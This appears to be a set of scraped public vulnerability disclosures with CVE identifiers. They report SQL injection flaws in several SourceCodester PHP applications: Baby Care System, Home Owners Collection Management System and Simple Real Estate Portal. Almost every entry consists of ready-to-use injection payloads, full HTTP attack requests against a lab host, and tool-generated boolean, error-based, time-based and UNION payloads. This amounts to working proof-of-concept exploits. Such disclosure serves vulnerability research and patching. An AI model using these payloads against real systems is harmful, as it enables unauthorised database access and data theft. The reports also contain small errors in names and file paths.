Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_phase.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_phase

Vulnerability location: /hocms/classes/Master.php?f=delete\_phase,id

\[+\]Payload: id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_phase HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=phases
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=1' RLIKE (SELECT (CASE WHEN (3093=3093) THEN 1 ELSE 0x28 END))-- TVaW
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9655 FROM(SELECT COUNT(\*),CONCAT(0x716a787a71,(SELECT (ELT(9655\=9655,1))),0x71786a7071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- rFkx

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=1' AND (SELECT 5645 FROM (SELECT(SLEEP(5)))IsZT)-- rkXc
\---

CVE-2022-28417: bug_report/SQLi-4.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/siteoptions.php&social=remove&sid=2.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/siteoptions.php&social=remove&sid=2

![image](https://user-images.githubusercontent.com/54017627/161355498-1ebd5765-a41e-496d-ad08-7c78cfce40ca.png)

Vulnerability location: /BabyCare/admin.php?id=siteoptions&social=remove&sid=2 //sid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=siteoptions&social=remove&sid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //sid is Injection point

GET /BabyCare/admin.php?id\=siteoptions&social\=remove&sid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161355323-758b342d-1772-410e-8f49-43541b6ad08f.png)

\--\-
Parameter: sid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=siteoptions&social\=remove&sid\=2' RLIKE (SELECT (CASE WHEN (2073=2073) THEN 2 ELSE 0x28 END))-- VDjh
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=siteoptions&social=remove&sid=2' AND EXTRACTVALUE(4201,CONCAT(0x5c,0x7171716b71,(SELECT (ELT(4201\=4201,1))),0x7162707a71))\-- YSja

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=siteoptions&social\=remove&sid\=2' AND (SELECT 2185 FROM (SELECT(SLEEP(5)))SlaH)-- rcEz
\---

![image](https://user-images.githubusercontent.com/54017627/161355507-a2606a11-a320-4575-a4bf-48745f08b463.png)

CVE-2022-28431: bug_report/SQLi-12.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/pagerole.php&action=edit&roleid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/pagerole.php&action=edit&roleid=

![image](https://user-images.githubusercontent.com/54017627/161354417-66bda321-25ca-4aca-91bc-d90c9c074a33.png)

Vulnerability location: /BabyCare/admin.php?id=pagerole&action=edit&roleid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=pagerole&action=edit&roleid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=pagerole&action\=edit&roleid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354255-69005e1b-1e0d-4860-b762-0669950e640b.png)

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=pagerole&action\=edit&roleid\=1' AND 3500=3500 AND 'WSTQ'\='WSTQ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=pagerole&action\=edit&roleid\=1' AND (SELECT 1894 FROM(SELECT COUNT(\*),CONCAT(0x71766a6a71,(SELECT (ELT(1894=1894,1))),0x71717a7671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'RNhF'\='RNhF

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=pagerole&action\=edit&roleid\=1' AND (SELECT 1574 FROM (SELECT(SLEEP(5)))ajLi) AND 'Muhu'\='Muhu

    Type: UNION query
    Title: Generic UNION query (NULL) \- 4 columns
    Payload: id\=pagerole&action\=edit&roleid\=\-1597' UNION ALL SELECT NULL,CONCAT(0x71766a6a71,0x43596647727573766d505568646d54524c656f76624861765845474c474579724872425466624363,0x71717a7671),NULL,NULL-- -
\---

![image](https://user-images.githubusercontent.com/54017627/161354345-4cf03726-ebc8-489e-ab6c-3fc1ebfd5018.png)

CVE-2022-28426: bug_report/SQLi-7.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&find=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&find=

Vulnerability location: /BabyCare/admin.php?id=posts&find= //find is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&find=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //find is Injection point

GET /BabyCare/admin.php?id\=posts&find\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: find (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&find\=3' RLIKE (SELECT (CASE WHEN (6593=6593) THEN 3 ELSE 0x28 END))-- zXvu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&find=3' AND (SELECT 3959 FROM(SELECT COUNT(\*),CONCAT(0x7170787071,(SELECT (ELT(3959\=3959,1))),0x7178787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- IVWt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&find\=3' AND (SELECT 4643 FROM (SELECT(SLEEP(5)))bafh)-- GSoV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=posts&find=3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x65476d614a4d4d69526c636a4e486f436b45485a67484d67736e4e47657a654761684c644d734557,0x7178787171),NULL#
\--\-

CVE-2022-28424: bug_report/SQLi-5.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/inbox.php&action=read&msgid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/inbox.php&action=read&msgid=

![image](https://user-images.githubusercontent.com/54017627/161354868-cc09a2cd-ef2a-4185-a6a9-9c70eb9c0c29.png)

Vulnerability location: /BabyCare/admin.php?id=inbox&action=read&msgid=11 //msgid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=inbox&action=read&msgid=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //msgid is Injection point

GET /BabyCare/admin.php?id\=inbox&action\=read&msgid\=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354750-1f5d471f-7c65-4025-b497-b1c04399c8c8.png)

\--\-
Parameter: msgid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=inbox&action\=read&msgid\=11' AND 4681=4681 AND 'xjEi'\='xjEi

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=inbox&action\=read&msgid\=11' AND (SELECT 9382 FROM(SELECT COUNT(\*),CONCAT(0x716b707871,(SELECT (ELT(9382=9382,1))),0x7178787071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'TmlF'\='TmlF

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=inbox&action\=read&msgid\=11' AND (SELECT 7228 FROM (SELECT(SLEEP(5)))cyYg) AND 'PNfI'\='PNfI
\--\-

![image](https://user-images.githubusercontent.com/54017627/161354890-0bdea68d-69f7-4945-a32e-de5c49329d50.png)

CVE-2022-28427: bug_report/SQLi-9.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=edit.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=edit

Vulnerability location: /BabyCare/admin.php?id=posts&action=edit&postid=2 //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=edit&postid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=edit&postid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=posts&action\=edit&postid\=2' AND 7502=7502 AND 'Yurq'\='Yurq

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 6867 FROM(SELECT COUNT(\*),CONCAT(0x7162786a71,(SELECT (ELT(6867=6867,1))),0x7170767071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'huoz'\='huoz

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 5804 FROM (SELECT(SLEEP(5)))ZBUN) AND 'nxGO'\='nxGO

    Type: UNION query
    Title: Generic UNION query (NULL) \- 8 columns
    Payload: id\=posts&action\=edit&postid\=\-9180' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786a71,0x4e436b74735063624a4164484d4f675676736e68467951525141677146614f56476b524f66456f50,0x7170767071),NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28422: bug_report/SQLi-3.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via BabyCare/admin.php?id=theme&setid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/theme.php

Vulnerability location: BabyCare/admin.php?id=theme&setid= //setid is Injection point

\[+\]Payload: setid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ //setid is Injection point

GET /BabyCare/admin.php?id\=theme&setid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: setid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=theme&setid\=1' AND 4666=4666 AND 'rScZ'\='rScZ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=theme&setid\=1' AND (SELECT 1518 FROM(SELECT COUNT(\*),CONCAT(0x7171707671,(SELECT (ELT(1518=1518,1))),0x7176717671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'KBjM'\='KBjM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=theme&setid\=1' AND (SELECT 8964 FROM (SELECT(SLEEP(5)))SZjt) AND 'pISR'\='pISR
\--\-

CVE-2022-28420: bug_report/SQLi-1.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=posts&action=display&value=1&postid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/post.php 

Vulnerability location: /BabyCare/admin.php?id=posts&action=display&value=1&postid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=display&value=1&postid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=display&value\=1&postid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=display&value\=1&postid\=1' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 1 ELSE 0x28 END))-- GiVX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&action=display&value=1&postid=1' AND (SELECT 7280 FROM(SELECT COUNT(\*),CONCAT(0x71627a7071,(SELECT (ELT(7280\=7280,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- PXXk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=display&value\=1&postid\=1' AND (SELECT 3574 FROM (SELECT(SLEEP(5)))SpIf)-- qCfa
\---

CVE-2022-28421: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/admin/?page=agents/manage_agent.

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/admin/?page=agents/manage\_agent&id=

Vulnerability location: /reps/admin/?page=agents/manage\_agent&id= , id

\[+\] Payload: /reps/admin/?page=agents/manage\_agent&id=-6193%27%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,CONCAT(0x71767a6b71,0x7771447369794d5759634665645151594641457976797a594e4572717a514845527a5456534d416b,0x7176787871),9,10,11,12,13,14--+ //id is Injection point

    GET /reps/admin/?page=agents/manage_agent&id=-6193%27%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,CONCAT(0x71767a6b71,0x7771447369794d5759634665645151594641457976797a594e4572717a514845527a5456534d416b,0x7176787871),9,10,11,12,13,14--+- HTTP/1.1
    Host: 192.168.1.19
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    //id is Injection point
    

\--\-
Parameter: id (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: page\=agents/manage\_agent&id\=1' AND 9572=9572 AND 'Lnjk'\='Lnjk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: page\=agents/manage\_agent&id\=1' AND (SELECT 2188 FROM (SELECT(SLEEP(5)))fVBu) AND 'ffQM'\='ffQM

    Type: UNION query
    Title: Generic UNION query (NULL) \- 14 columns
    Payload: page\=agents/manage\_agent&id\=\-1480' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x6a49765a49784c4b45514e6d766369555a78597a6a6267764d5653626e7076744250516f59764b66,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28411: bug_report/SQLi-5.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=type&userrole=User&userid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=type&userrole=User&userid=

![image](https://user-images.githubusercontent.com/54017627/161356789-ddde867a-52c8-4dfc-831e-a59cf9d49c36.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=type&userrole=User&userid=1 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=type&userrole=User&userid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=type&userrole\=User&userid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356877-97aa81d0-2ef7-4696-80fe-20af0b6bfd08.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=type&userrole\=User&userid\=1' RLIKE (SELECT (CASE WHEN (4612=4612) THEN 1 ELSE 0x28 END))-- Wlmz
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=users&action=type&userrole=User&userid=1' AND EXTRACTVALUE(3489,CONCAT(0x5c,0x7170767671,(SELECT (ELT(3489\=3489,1))),0x71787a6271))\-- THEv

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=type&userrole\=User&userid\=1' AND (SELECT 1342 FROM (SELECT(SLEEP(5)))LPbX)-- UTgs
\---

![image](https://user-images.githubusercontent.com/54017627/161356928-717b132b-f532-4016-8e2f-75410e578a94.png)

Tag

#windows